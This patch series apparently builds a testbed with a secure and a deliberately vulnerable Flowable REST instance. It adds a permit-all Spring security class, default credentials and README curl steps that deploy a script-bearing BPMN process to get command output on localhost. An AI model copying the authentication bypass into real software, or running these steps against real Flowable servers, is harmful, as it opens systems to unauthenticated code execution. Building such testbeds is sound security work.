From c8343015167ddb21e50395002210d9269d122843 Mon Sep 17 00:00:00 2001 From: devampkid Date: Wed, 13 Aug 2025 03:48:05 +0400 Subject: [PATCH 1/7] Flowable exposed UI --- flowable/exposed_ui/README.md | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 flowable/exposed_ui/README.md diff --git a/flowable/exposed_ui/README.md b/flowable/exposed_ui/README.md new file mode 100644 index 00000000..7a2e975a --- /dev/null +++ b/flowable/exposed_ui/README.md @@ -0,0 +1,21 @@ +# Exposed UI Setup +```bash +docker run -p 127.0.0.1:8080:8080 flowable/flowable-rest +``` + +# How to Exploit the Exposed UI +```bash +curl -X POST \ + 'http://localhost:4200/flowable-rest/service/repository/deployments' \ + -H 'Content-Type: multipart/form-data' \ + -H "Authorization: Basic cmVzdC1hZG1pbjp0ZXN0" \ + -F 'file=@jsScript.bpmn' + +curl -X POST \ + 'http://localhost:4200/flowable-rest/service/runtime/process-instances' \ + -H 'Content-Type: application/json' \ + -H "Authorization: Basic cmVzdC1hZG1pbjp0ZXN0" \ + -d '{ + "processDefinitionKey": "jsScriptProcess" + }' +``` \ No newline at end of file From 16062c163037a17e04f2bfbf2b30d792bab63c96 Mon Sep 17 00:00:00 2001 From: devampkid Date: Wed, 13 Aug 2025 04:02:18 +0400 Subject: [PATCH 2/7] minor: fix ports of curl cmds --- flowable/exposed_ui/README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/flowable/exposed_ui/README.md b/flowable/exposed_ui/README.md index 7a2e975a..f6b28938 100644 --- a/flowable/exposed_ui/README.md +++ b/flowable/exposed_ui/README.md @@ -6,13 +6,13 @@ docker run -p 127.0.0.1:8080:8080 flowable/flowable-rest # How to Exploit the Exposed UI ```bash curl -X POST \ - 'http://localhost:4200/flowable-rest/service/repository/deployments' \ + 'http://localhost:8080/flowable-rest/service/repository/deployments' \ -H 'Content-Type: multipart/form-data' \ -H "Authorization: Basic cmVzdC1hZG1pbjp0ZXN0" \ -F 'file=@jsScript.bpmn' curl -X POST \ - 'http://localhost:4200/flowable-rest/service/runtime/process-instances' \ + 'http://localhost:8080/flowable-rest/service/runtime/process-instances' \ -H 'Content-Type: application/json' \ -H "Authorization: Basic cmVzdC1hZG1pbjp0ZXN0" \ -d '{ From 1124b318f07a64d95e07fa53eda7676188b801f8 Mon Sep 17 00:00:00 2001 From: devampkid Date: Wed, 13 Aug 2025 04:16:33 +0400 Subject: [PATCH 3/7] add jsScript.bpmn --- flowable/exposed_ui/jsScript.bpmn | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 flowable/exposed_ui/jsScript.bpmn diff --git a/flowable/exposed_ui/jsScript.bpmn b/flowable/exposed_ui/jsScript.bpmn new file mode 100644 index 00000000..0ec2779e --- /dev/null +++ b/flowable/exposed_ui/jsScript.bpmn @@ -0,0 +1,30 @@ + + + + + + + + + + + + + + From 1a54d32ee84cdbf6d8b52615d40fc48eeb08f809 Mon Sep 17 00:00:00 2001 From: devampkid Date: Wed, 13 Aug 2025 14:36:48 +0400 Subject: [PATCH 4/7] finished the setup --- flowable/exposed_ui/Caddyfile | 5 +++++ flowable/exposed_ui/README.md | 4 ++-- flowable/exposed_ui/docker-compose.yml | 24 ++++++++++++++++++++++++ 3 files changed, 31 insertions(+), 2 deletions(-) create mode 100644 flowable/exposed_ui/Caddyfile create mode 100644 flowable/exposed_ui/docker-compose.yml diff --git a/flowable/exposed_ui/Caddyfile b/flowable/exposed_ui/Caddyfile new file mode 100644 index 00000000..a5808bf7 --- /dev/null +++ b/flowable/exposed_ui/Caddyfile @@ -0,0 +1,5 @@ +:8081 { + reverse_proxy flowable:8080 { + header_up Authorization "Basic cmVzdC1hZG1pbjp0ZXN0" + } +} \ No newline at end of file diff --git a/flowable/exposed_ui/README.md b/flowable/exposed_ui/README.md index f6b28938..438b4920 100644 --- a/flowable/exposed_ui/README.md +++ b/flowable/exposed_ui/README.md @@ -6,13 +6,13 @@ docker run -p 127.0.0.1:8080:8080 flowable/flowable-rest # How to Exploit the Exposed UI ```bash curl -X POST \ - 'http://localhost:8080/flowable-rest/service/repository/deployments' \ + 'http://localhost:8081/flowable-rest/service/repository/deployments' \ -H 'Content-Type: multipart/form-data' \ -H "Authorization: Basic cmVzdC1hZG1pbjp0ZXN0" \ -F 'file=@jsScript.bpmn' curl -X POST \ - 'http://localhost:8080/flowable-rest/service/runtime/process-instances' \ + 'http://localhost:8081/flowable-rest/service/runtime/process-instances' \ -H 'Content-Type: application/json' \ -H "Authorization: Basic cmVzdC1hZG1pbjp0ZXN0" \ -d '{ diff --git a/flowable/exposed_ui/docker-compose.yml b/flowable/exposed_ui/docker-compose.yml new file mode 100644 index 00000000..216aeb5d --- /dev/null +++ b/flowable/exposed_ui/docker-compose.yml @@ -0,0 +1,24 @@ +version: '3' + +services: + flowable: + image: flowable/flowable-rest + container_name: flowable-rest + networks: + - flowable-network + + caddy: + image: caddy:2.8.4 + container_name: caddy-proxy + ports: + - "8081:8081" + volumes: + - ./Caddyfile:/etc/caddy/Caddyfile + networks: + - flowable-network + depends_on: + - flowable + +networks: + flowable-network: + driver: bridge \ No newline at end of file From cc2800002541a49fe29b344f8ca8eeb92c266711 Mon Sep 17 00:00:00 2001 From: devampkid Date: Tue, 30 Sep 2025 20:06:44 +0400 Subject: [PATCH 5/7] updated README.md contains both secure and vulnerable setup instructions --- flowable/exposed_ui/README.md | 13 +++++++------ flowable/exposed_ui/docker-compose.yml | 2 ++ 2 files changed, 9 insertions(+), 6 deletions(-) diff --git a/flowable/exposed_ui/README.md b/flowable/exposed_ui/README.md index 438b4920..5f9bdcc2 100644 --- a/flowable/exposed_ui/README.md +++ b/flowable/exposed_ui/README.md @@ -1,21 +1,22 @@ -# Exposed UI Setup +# Setup secure and vulnerable Flowable instances ```bash -docker run -p 127.0.0.1:8080:8080 flowable/flowable-rest +docker compose up ``` +test secure instance with this URL: http://localhost:8080/flowable-rest/service/repository/deployments +test vulnerable instance with this URL: http://localhost:8081/flowable-rest/service/repository/deployments -# How to Exploit the Exposed UI +# How to Exploit the Exposed UI (on Vulnerable Instance) ```bash curl -X POST \ 'http://localhost:8081/flowable-rest/service/repository/deployments' \ -H 'Content-Type: multipart/form-data' \ - -H "Authorization: Basic cmVzdC1hZG1pbjp0ZXN0" \ -F 'file=@jsScript.bpmn' curl -X POST \ 'http://localhost:8081/flowable-rest/service/runtime/process-instances' \ -H 'Content-Type: application/json' \ - -H "Authorization: Basic cmVzdC1hZG1pbjp0ZXN0" \ -d '{ "processDefinitionKey": "jsScriptProcess" }' -``` \ No newline at end of file +``` +Look for the `"variables":[{"name":"commandOutput","type":"string","value":"` at output of the last command. \ No newline at end of file diff --git a/flowable/exposed_ui/docker-compose.yml b/flowable/exposed_ui/docker-compose.yml index 216aeb5d..7a7ec456 100644 --- a/flowable/exposed_ui/docker-compose.yml +++ b/flowable/exposed_ui/docker-compose.yml @@ -4,6 +4,8 @@ services: flowable: image: flowable/flowable-rest container_name: flowable-rest + ports: + - "8080:8080" networks: - flowable-network From f62b28437252a9358f7c2479f4fabb14f856938e Mon Sep 17 00:00:00 2001 From: devampkid Date: Fri, 13 Feb 2026 16:18:08 +0400 Subject: [PATCH 6/7] instead of a reverse proxy which removes authentication, we skip the authentication by changing the spring boot security configuration --- flowable/exposed_ui/Caddyfile | 5 ---- flowable/exposed_ui/Dockerfile | 19 +++++++++++++++ flowable/exposed_ui/README.md | 24 ++++++++++++++++--- .../exposed_ui/SecurityConfiguration.java | 23 ++++++++++++++++++ flowable/exposed_ui/docker-compose.yml | 18 ++++++-------- 5 files changed, 70 insertions(+), 19 deletions(-) delete mode 100644 flowable/exposed_ui/Caddyfile create mode 100644 flowable/exposed_ui/Dockerfile create mode 100644 flowable/exposed_ui/SecurityConfiguration.java diff --git a/flowable/exposed_ui/Caddyfile b/flowable/exposed_ui/Caddyfile deleted file mode 100644 index a5808bf7..00000000 --- a/flowable/exposed_ui/Caddyfile +++ /dev/null @@ -1,5 +0,0 @@ -:8081 { - reverse_proxy flowable:8080 { - header_up Authorization "Basic cmVzdC1hZG1pbjp0ZXN0" - } -} \ No newline at end of file diff --git a/flowable/exposed_ui/Dockerfile b/flowable/exposed_ui/Dockerfile new file mode 100644 index 00000000..534dc142 --- /dev/null +++ b/flowable/exposed_ui/Dockerfile @@ -0,0 +1,19 @@ +FROM eclipse-temurin:21-jdk AS builder + +# Copy the Flowable REST app libs for compilation classpath +COPY --from=flowable/flowable-rest /app/WEB-INF/lib /libs +COPY --from=flowable/flowable-rest /app/WEB-INF/classes /classes + +# Copy our replacement SecurityConfiguration +COPY SecurityConfiguration.java /src/SecurityConfiguration.java + +# Compile the replacement SecurityConfiguration against the app's classpath +RUN javac -cp "/libs/*:/classes" \ + -d /output \ + /src/SecurityConfiguration.java + +FROM flowable/flowable-rest + +# Replace the original SecurityConfiguration with our permit-all version +COPY --from=builder /output/org/flowable/rest/conf/SecurityConfiguration.class \ + /app/WEB-INF/classes/org/flowable/rest/conf/SecurityConfiguration.class diff --git a/flowable/exposed_ui/README.md b/flowable/exposed_ui/README.md index 5f9bdcc2..83330f99 100644 --- a/flowable/exposed_ui/README.md +++ b/flowable/exposed_ui/README.md @@ -2,8 +2,26 @@ ```bash docker compose up ``` -test secure instance with this URL: http://localhost:8080/flowable-rest/service/repository/deployments -test vulnerable instance with this URL: http://localhost:8081/flowable-rest/service/repository/deployments + +## Test Secure Instance +The secure instance requires basic authentication (default credentials: `rest-admin:test`): +```bash +# Without credentials — should return 401 Unauthorized +curl -s -o /dev/null -w "%{http_code}" http://localhost:8080/flowable-rest/service/repository/deployments +# Expected: 401 + +# With credentials — should return 200 OK +curl -v -u rest-admin:test http://localhost:8080/flowable-rest/service/repository/deployments +# Expected: HTTP/1.1 200 with http response contains a json +``` + +## Test Vulnerable Instance +The vulnerable instance has basic authentication disabled: +```bash +# Without credentials — should return 200 OK (no auth required) +curl -v http://localhost:8081/flowable-rest/service/repository/deployments +# Expected: HTTP/1.1 200 +``` # How to Exploit the Exposed UI (on Vulnerable Instance) ```bash @@ -19,4 +37,4 @@ curl -X POST \ "processDefinitionKey": "jsScriptProcess" }' ``` -Look for the `"variables":[{"name":"commandOutput","type":"string","value":"` at output of the last command. \ No newline at end of file +Look for the `"variables":[{"name":"commandOutput","type":"string","value":"` at output of the last command. diff --git a/flowable/exposed_ui/SecurityConfiguration.java b/flowable/exposed_ui/SecurityConfiguration.java new file mode 100644 index 00000000..89b1ce33 --- /dev/null +++ b/flowable/exposed_ui/SecurityConfiguration.java @@ -0,0 +1,23 @@ +package org.flowable.rest.conf; + +import org.springframework.context.annotation.Bean; +import org.springframework.context.annotation.Configuration; +import org.springframework.security.config.annotation.web.builders.HttpSecurity; +import org.springframework.security.config.annotation.web.configuration.EnableWebSecurity; +import org.springframework.security.web.SecurityFilterChain; + +@Configuration +@EnableWebSecurity +public class SecurityConfiguration { + + @Bean + public SecurityFilterChain securityFilterChain(HttpSecurity http) throws Exception { + http + .authorizeHttpRequests(authorize -> authorize + .anyRequest().permitAll() + ) + .csrf(csrf -> csrf.disable()) + .httpBasic(basic -> basic.disable()); + return http.build(); + } +} diff --git a/flowable/exposed_ui/docker-compose.yml b/flowable/exposed_ui/docker-compose.yml index 7a7ec456..1f36f15f 100644 --- a/flowable/exposed_ui/docker-compose.yml +++ b/flowable/exposed_ui/docker-compose.yml @@ -1,26 +1,22 @@ version: '3' services: - flowable: + flowable-secure: image: flowable/flowable-rest - container_name: flowable-rest + container_name: flowable-rest-secure ports: - "8080:8080" networks: - flowable-network - caddy: - image: caddy:2.8.4 - container_name: caddy-proxy + flowable-vulnerable: + build: . + container_name: flowable-rest-vulnerable ports: - - "8081:8081" - volumes: - - ./Caddyfile:/etc/caddy/Caddyfile + - "8081:8080" networks: - flowable-network - depends_on: - - flowable networks: flowable-network: - driver: bridge \ No newline at end of file + driver: bridge From 69af0e7fee2a5ed09d1ec85f948e2fb5cf746503 Mon Sep 17 00:00:00 2001 From: kevin s Date: Sat, 21 Feb 2026 02:47:56 +0400 Subject: [PATCH 7/7] Update flowable/exposed_ui/SecurityConfiguration.java Co-authored-by: Robert Dick --- flowable/exposed_ui/SecurityConfiguration.java | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) diff --git a/flowable/exposed_ui/SecurityConfiguration.java b/flowable/exposed_ui/SecurityConfiguration.java index 89b1ce33..4ad672ac 100644 --- a/flowable/exposed_ui/SecurityConfiguration.java +++ b/flowable/exposed_ui/SecurityConfiguration.java @@ -1,3 +1,21 @@ +/* + * Copyright 2026 Google LLC + * + * Modified from the original version to remove authentication checks + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ package org.flowable.rest.conf; import org.springframework.context.annotation.Bean;